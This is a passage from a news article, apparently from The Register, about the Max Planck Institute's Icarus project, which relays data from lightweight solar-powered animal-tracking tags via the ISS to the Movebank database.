The ISS will collect signals from special lightweight transmitters, designed by German space equipment specialist SpaceTech, weighing less than five grams each, and powered by the Sun. Besides GPS, these transmitters are also equipped with accelerometers, temperature, pressure and humidity sensors.

The space station will then beam the measurement data to a ground station, where it will be processed and made freely available to anyone through the Movebank animal tracking database. This obviously excludes data on endangered species – you wouldn’t want to make things any easier for poachers.

Today, most animal-tagging projects focus on a single species, in a small geographic area. Satellite tracking is possible, but this is currently achieved through the outdated Argos system, in use since 1978 and limited to larger animals. In comparison, Icarus can track beasties as light as 100g in body weight.

The Icarus project hopes to apply modern tech to track up to 200,000 individual animals worldwide. Initial targets include bears, elephants, antelopes, wildebeest, giraffes, zebras and leopards; the team at Max Planck Institute for Ornithology is obviously most interested in birds, and the sensors can even track fish.

“Icarus could do for our understanding of planet Earth what the human genome project with its decoding of human genetic material did for genetics,” the project’s website states.

Data obtained by the project will help establish migration patterns, response to environmental changes, and whether (and how) animals can predict natural disasters like earthquakes and volcanic eruptions – there’s plenty of anecdotal evidence, but this has never been decisively proven.

“The animals have evolved for millions of years, their senses are tuned to the environment, they have better hardware: their noses are better, their ears are better, and they also have better sensory systems to deal with this information,” Martin Wikelski, managing director at Max Planck Institute for Ornithology and project leader, said in 2018.

“If we take many of those animals together, then we have a network of intelligent, distributed sensors that have evolved to sense the environment.” ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/icarus_project_is_going_live_to_track_wildlife_from_space/